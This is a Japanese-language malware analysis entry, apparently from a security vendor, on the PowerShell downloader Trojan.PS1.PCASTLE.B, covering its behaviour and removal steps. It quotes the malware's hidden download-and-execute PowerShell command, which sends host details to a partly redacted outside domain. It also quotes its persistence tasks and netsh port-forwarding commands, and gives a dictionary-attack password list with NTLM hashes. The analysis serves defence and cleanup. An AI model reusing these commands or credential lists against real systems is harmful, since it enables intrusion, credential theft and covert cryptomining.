解析者: Arvin Roi Macaraeg   
 更新者 : Patrick Angelo Roderno

 別名:

TrojanDownloader:PowerShell/Credcalper (MICROSOFT); HEUR:Trojan.PowerShell.Generic (KASPERSKY); Mal/PSDL-J (SOPHOS)

 プラットフォーム:

Windows

 危険度:
 ダメージ度:
 感染力:
 感染確認数:
 情報漏えい:

  • マルウェアタイプ:
    トロイの木馬型

  • 破壊活動の有無:
    なし

  • 暗号化:
    なし

  • 感染報告の有無 :
    はい

  概要

感染経路 インターネットからのダウンロード

トレンドマイクロは、このマルウェアをNoteworthy(要注意)に分類しました。

マルウェアは、ボット型マルウェア「Trojan.PS1.LUDICROUZ.A」によってダウンロードされる難読化されたPowerShellスクリプトです。このPowerShellスクリプトは、「Trojan.PS1.LUDICROUZ.A」のコンポーネントをダウンロードして実行するドロッパです。

マルウェアは、複数の拡散手法を使用して可能な限り多くのPCとサーバに仮想通貨発掘ツールを拡散する活動に関与しています。情報公開日時点で検出の多い国/地域は、中国、豪州、台湾、ベトナム、香港、インドです。

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

マルウェアは、特定の脆弱性を利用した感染活動を実行します。

  詳細

ファイルサイズ 3,122,543 bytes
メモリ常駐 なし
発見日 2019年3月12日
ペイロード URLまたはIPアドレスに接続, 情報収集

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、以下のファイルを作成します。

  • %AppDataLocal%\kkk1.log
  • %AppDataLocal%\pp2.log
  • %AppDataLocal%\333.log
  • %AppDataLocal%\kk4.log
  • %AppDataLocal%\kk5.log

(註:%AppDataLocal%フォルダは、ローカルアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local" です。)

マルウェアは、以下のプロセスを追加します。

  • powershell Start-Process -FilePath cmd.exe -ArgumentList "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.{BLOCKED}h.com/newol.dat?allv5" +
    "&mac={MAC Address}&av={List of AV Products}&version={OS Version}&bit={OS Architecture}&flag2=
    False&domain={Domain Name}&user={Username}&PS={If Powershell-Enabled}" + "')" + '""

マルウェアは、以下の Mutex を作成し、メモリ上で自身の重複実行を避けます。

  • Global\powerv5

情報漏えい

マルウェアは、以下の情報を収集します。

  • OS Version
  • MAC Address
  • List of AV products from the victim's machine
  • OS Architecture
  • Username
  • Domain Name

その他

マルウェアは、以下の脆弱性を利用して感染活動を実行します。

<補足>
インストール

マルウェアは、以下のプロセスを追加します。

  • powershell Start-Process -FilePath cmd.exe -ArgumentList "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.{BLOCKED}h.com/newol.dat?allv5" +  "&mac={MACアドレス}&av={セキュリティ対策製品の一覧}&version={OSのバージョン}&bit={OSアーキテクチャ}&flag2= False&domain={ドメイン名}&user={ユーザ名}&PS={If Powershell-Enabled}" + "')" + '""

情報漏えい

マルウェアは、以下の情報を収集します。

  • OSのバージョン
  • MACアドレス
  • セキュリティ対策製品の一覧(感染コンピュータから)
  • OSのアーキテクチャ
  • ユーザ名
  • ドメイン名

その他

マルウェアは、以下を実行します。

  • PingCastleスキャナを使用して、脆弱性を持つ攻撃対象コンピュータを特定する
  • 以下の認証情報を使って辞書攻撃を実行する
    • ユーザ名:
      • administrator
    • パスワード:
      • 123456
      • password
      • PASSWORD
      • football
      • welcome
      • 1
      • 12
      • 21
      • 123
      • 321
      • 1234
      • 12345
      • 123123
      • 123321
      • 111111
      • 654321
      • 666666
      • 121212
      • 0
      • 222222
      • 888888
      • 1111
      • 555555
      • 1234567
      • 12345678
      • 123456789
      • 987654321
      • admin
      • abc123
      • abcd1234
      • abcd@1234
      • abc@123
      • p@ssword
      • P@ssword
      • p@ssw0rd
      • P@ssw0rd
      • P@SSWORD
      • P@SSW0RD
      • P@$$w0rd
      • P@$$word
      • P@$$w0rd
      • iloveyou
      • monkey
      • login
      • passw0rd
      • master
      • hello
      • qazwsx
      • password1
      • qwerty
      • baseball
      • qwertyuiop
      • superman
      • 1qaz2wsx
      • fuckyou
      • 123qwe
      • zxcvbn
      • pass
      • aaaaaa
      • love
      • administrator
    • パスワードのハッシュ:
      • 32ed87bdb5fdc5e9cba88547376818d4
      • 8846f7eaee8fb117ad06bdd830b7586c
      • 7b592e4f8178b4c75788531b2e747687
      • 31fc0dc8f7dfad0e8bd7ccc3842f2ce9
      • 674e48b68c5cd0efd8f7e5faa87b3d1e
      • 69943c5e63b4d2c104dbbcc15138b72b
      • 588feb889288fb953b5f094d47d1565c
      • bcdf115fd9ba99336c31e176ee34b304
      • 3dbde697d71690a769204beb12283678
      • df54de3f3438343202c1dd523d0265be
      • 7ce21f17c0aee7fb9ceba532d0546ad6
      • 7a21990fcd3d759941e45c490f143d5f
      • 579110c49145015c47ecd267657d3174
      • af27efb60c7b238910efe2a7e0676a39
      • 2d7f1a5a61d3a96fb5159b5eef17adc6
      • 4057b60b514c5402dde3d29a1845c366
      • e8cd0e4a9e89eab931dc5338fcbec54a
      • 6920c58d0df184d829189c44fafb7ece
      • 3fa45a060bd2693ae4c05b601d05ca0c
      • ba07ba35933e5bf42dea4af8add09d1e
      • f1351ac828428d74f6da2968089fc91f
      • e84d037613721532e6b6d84d215854b6
      • 2f2d544c53b3031f24d63402ea7fb4f9
      • 328727b81ca05805a68ef26acb252039
      • 259745cb123a52aa2e693aaacca2db52
      • c22b315c040ae6e0efee3518d830362b
      • 162e829be112225fedf856e38e1c65fe
      • 209c6174da490caeb422f3fa5a7ae634
      • f9e37e83b83c47a93c2f09f66408631b
      • b3ec3e03e2a202cbd54fd104b8504fef
      • 4ed91524cb54eaacc17a185646fb7491
      • aa647b916a1fad374df9c30711d58a7a
      • a80c9cc3f8439ada25af064a874efe2d
      • 13b29964cc2480b4ef454c59562e675c
      • de26cce0356891a4a020e7c4957afc72
      • e19ccf75ee54e06b06a5907af13cef42
      • 30fcaa8ad9a496b3e17f7fbfacc72993
      • 41630abb825ca50da31ce1fac1e9f54d
      • f56a8399599f1be040128b1dd9623c29
      • 2e4dbf83aa056289935daea328977b20
      • f56a8399599f1be040128b1dd9623c29
      • b963c57010f218edc2cc3c229b5e4d0f
      • f2477a144dff4f216ab81f2ac3e3207d
      • e6bd4cdb1e447131b60418f31d0b81d6
      • b9f917853e3dbf6e6831ecce60725930
      • 6d3986e540a63647454a50e26477ef94
      • 066ddfd4ef0e9cd7c256fe77191ef43c
      • 152efbcfafeb22eabda8fc5e68697a41
      • 5835048ce94ad0564e29a924a03510ef
      • 2d20d252a479f485cdf5e171d93985bf
      • 320a78179516c385e35a93ffa0b1c4ac
      • 0d757ad173d2fc249ce19364fd64c8ec
      • 72f5cfa80f07819ccbcfb72feb9eb9b7
      • f67f5e3f66efd7298be6acd32eeeb27c
      • 1c4ecc8938fb93812779077127e97662
      • ad70819c5bc807280974d80f45982011
      • a836ef24f0a529688be2af1479a95411
      • 36aa83bdcab3c9fdaf321ca42a31c3fc
      • acb98fd0478427cd18949050c5e87b47
      • 85deeec2d12f917783b689ae94990716
      • a4141712f19e9dd5adf16919bb38a95c
  • 以下のURLのコンテンツをダウンロードしてメモリ内で実行する
    • http://p.{BLOCKED}h.com/upgrade.php?ver=3&mac={MACアドレス}&av={セキュリティ対策製品の一覧}
      &ver={OSのバージョン}&bit={OSアーキテクチャ}
    • http://{BLOCKED}.{BLOCKED}.107.137/status.json?allv5&mac={MACアドレス}&av={セキュリティ対策製品の一覧} &version={OSのバージョン}&bit={OSアーキテクチャ}&flag2=False&domain={ドメイン名}&user={ユーザ名}&PS= {If Powershell-Enabled}&{感染の状況報告}&{マルウェアのディレクトリ\マルウェアのファイル名}
  • 「pass the hash」攻撃を実行する。「pass the hash」攻撃に成功すると以下を実行する
    • ファイル%User Startup%\run.batが存在する場合、削除する
    • 以下のファイルを作成する
      • %Application Data%\sign.txt
      • %Application Data%\flashplayer.tmp
      • %User Startup%\FlashPlayer.lnk
  • 以下の作成されたログファイルの存在を確認し、ファイルが存在しない場合は活動を実行する
    • kkk1.logが存在しない場合
      • 管理者権限がある場合
        • URL”http://v.{BLOCKED}h.net/g?h{'yyMMdd'の形式の感染日時}”に接続して、不正なコードをダウンロードして実行する
        • スケジュールされたタスクを作成する
          • タスク名: \Microsoft\windows\{MACアドレス}
          • アクション: powershell -nop -ep bypass -e [http://v.y6h.net/g?h{'yyMMdd'の形式の感染日時}からの不正なコード]
      • 上記以外の場合
        • URL”http://v.{BLOCKED}h.net/g?h{'yyMMdd'の形式の感染日時}”に接続して、不正なコードをダウンロードして実行する
        • スケジュールされたタスクを作成する
          • タスク名: {MACアドレス}
          • アクション: powershell -nop -ep bypass -e [http://v.{BLOCKED}h.net/g?l{'yyMMdd'の形式の感染日時}からの不正なコード]
  • pp2.logが存在しない場合
    • ディレクトリの作成: %Application Data%\Microsoft
      ファイル%Application Data%\ Microsoft \ cred.ps1の存在を確認し、存在しない場合、http://down.{BLOCKED}h.com/new.dat?allv5&mac={MACアドレス}&av={セキュリティ対対策製品の一覧}&version={OSのバージョン}&bit={OSのアーキテクチャ}&flag2=False&domain={ドメイン名}&user={ユーザ名}&PS={If Powershell-Enabled}に接続して、不正なファイルをダウンロードして、ファイル名%Application Data%\Microsoft\cred.ps1として保存する
    • スケジュールされたタスクを作成し実行する
      • タスク名: Credentials
      • アクション: powershell -nop -w hidden -ep bypass -f %Application Data%\Microsoft\cred.ps1
  • 333.logが存在しない場合
    • http://down.{BLOCKED}h.com/mn.dat?allv5&mac={MACアドレス}&av={セキュリティ対策製}&version={OSのバージョン}&bit={OS のアーキテクチャ}&flag2=False&domain={ドメイン名}&user={ユーザ名}&PS={If Powershell-Enabled}に接続して、不正なファイルをダウンロードし、ファイル名%AppDataLocal%\mn.exeとして保存する
    • %AppDataLocal%\mn.exeの実行
  • kk4.logが存在しない場合
    • http://down.{BLOCKED}h.com/ii.dat?p=allv5&mac={MACアドレス}&av={セキュリティ対策製品の一覧}&version={OS のバージョン}&bit={OS のアーキテクチャ}&flag2=False&domain={ドメイン名}&user={ユーザ名}&PS={If Powershell-Enabled} に接続して、不正なファイルをダウンロードして、ファイル名%AppDataLocal%\{ランダムな4-8文字 }.exeとして保存する
    • さらに
      • 管理者権限がある場合
        • スケジュールされたタスクを作成する
          • タスク名: \Microsoft\Windows\{ランダムな4-8文字}
          • Action: %AppDataLocal%\{ランダムな4-8文字}.exe
      • 管理者権限でない場合
        • ダウンロードしたファイルの自動実行に使用するスクリプトファイル%AppDataLocal%\ run.vbsを作成する
        • スケジュールされたタスクを作成する
          • タスク名: {ランダムな4-8文字}
          • アクション: %AppDataLocal%\run.vbs
      • kk5.logが存在しない場合
        • http://down.{BLOCKED}h.com/ddd.dat?allv5&mac={MACアドレス}&av={セキュリティ対策製品の一覧}&version={OSのバージョン}&bit={OSのアーキテクチャ}&flag2=False&domain={ドメイン名}&user={ユーザ名}&PS={If Powershell-Enabled} に接続し、不正なファイルをダウンロードしてファイル名%AppDataLocal%\ddd.exeとして保存する
        • %AppDataLocal%\ddd.exeの実行
    • 辞書攻撃に成功すると、マルウェアは、以下を実行する
      • 以下のプロセスを実行する
        • netsh.exe firewall add portopening tcp 65533 DNS
        • netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
      • スケジュールされたタスクを作成する
        • タスク名: \Microsoft\windows\Bluetooths
        • アクション: powershell -nop -ep bypass -e {base64でエンコードされたコマンド}

  対応方法

対応検索エンジン: 9.850
初回 VSAPI パターンバージョン 14.920.05
初回 VSAPI パターンリリース日 2019年4月5日
VSAPI OPR パターンバージョン 14.921.00
VSAPI OPR パターンリリース日 2019年4月6日

手順 1

Windows XP、Windows Vista および Windows 7 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

手順 2

このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム(OS)の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル/フォルダ/レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。

手順 3

「Trojan.PS1.PCASTLE.B」で検出したファイル名を確認し、そのファイルを終了します。

[ 詳細 ]

  • すべての実行中プロセスが、Windows のタスクマネージャに表示されない場合があります。この場合、"Process Explorer" などのツールを使用しマルウェアのファイルを終了してください。"Process Explorer" については、こちらをご参照下さい。
  • 検出ファイルが、Windows のタスクマネージャまたは "Process Explorer" に表示されるものの、削除できない場合があります。この場合、コンピュータをセーフモードで再起動してください。
    セーフモードについては、こちらをご参照下さい。
  • 検出ファイルがタスクマネージャ上で表示されない場合、次の手順にお進みください。

手順 4

スケジュールされたタスクを削除する

タスク削除の手順に含まれる{タスク名} - {実行するタスク}には以下が当てはまります。

  • \Microsoft\windows\{MAC Address} - powershell -nop -ep bypass -e [malicious code from http://v.y6h.net/g?h{date of infection in the format 'yyMMdd'}]
  • {MAC Address} - powershell -nop -ep bypass -e [malicious code from http://v.y6h.net/g?l{date of infection in the format 'yyMMdd'}]
  • Credentials - powershell -nop -w hidden -ep bypass -f %Application Data%\Microsoft\cred.ps1
  • \Microsoft\Windows\{random 4-8 characters} - %AppDataLocal%\{random 4-8 characters}.exe
  • {random 4-8 characters} - %AppDataLocal%\run.vbs
  • \Microsoft\windows\Bluetooths - powershell -nop -ep bypass -e {base64-encoded command}

Windows 2000、Windows XP、Windows Server 2003の場合:

  1. [スタート]→[プログラム]→[アクセサリ]→[システムツール]→[スケジュールされたタスク]をクリックして、スケジュールされたタスクを開きます。
  2. 上記の{タスク名} を、[名前]の欄に入力します。
  3. 入力した{タスク名} 持つファイルを右クリックします。
  4. [プロパティ]をクリックします。 [実行]フィールドで、表示されている{実行するタスク}を確認します。
  5. 上記の{実行するタスク}と文字列が一致するタスクを削除します。

Windows Vista、Windows 7、Windows Server 2008、Windows 8、Windows 8.1、およびWindows Server 2012の場合:

  1. Windowsタスクスケジューラを開きます。
    • Windows Vista、Windows 7、Windows Server 2008の場合、[スタート]をクリックし、[検索]フィールドに「taskchd.msc」と入力してEnterキーを押します。
    • Windows 8、Windows 8.1、Windows Server 2012の場合、画面の左下隅を右クリックし、[実行]をクリックし、「taskchd.msc」と入力してEnterキーを押します。
  2. 左側のパネルで、[タスクスケジューラライブラリ]をクリックします。
  3. 中央上部のパネルで、上記の{タスク名}を[名前]の欄に入力します。
  4. 中央下部のパネルで、[アクション]タブをクリックします。 [詳細]の欄で、{実行するタスク}を確認します。
  5. 文字列が一致するタスクを削除します。

手順 5

以下のファイルを検索し削除します。

[ 詳細 ]
コンポーネントファイルが隠しファイル属性の場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。
  • %AppDataLocal%\kkk1.log
  • %AppDataLocal%\pp2.log
  • %AppDataLocal%\333.log
  • %AppDataLocal%\kk4.log
  • %AppDataLocal%\kk5.log
  • %AppDataLocal%\mn.exe
  • %AppDataLocal%\{random 4-8 characters}.exe
  • %AppDataLocal%\run.vbs
  • %AppDataLocal%\ddd.exe
  • %Application Data%\sign.txt
  • %Application Data%\flashplayer.tmp
  • %Application Data%\Microsoft\cred.ps1
  • %User Startup%\FlashPlayer.lnk

手順 6

最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.PS1.PCASTLE.B」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。


ご利用はいかがでしたか? アンケートにご協力ください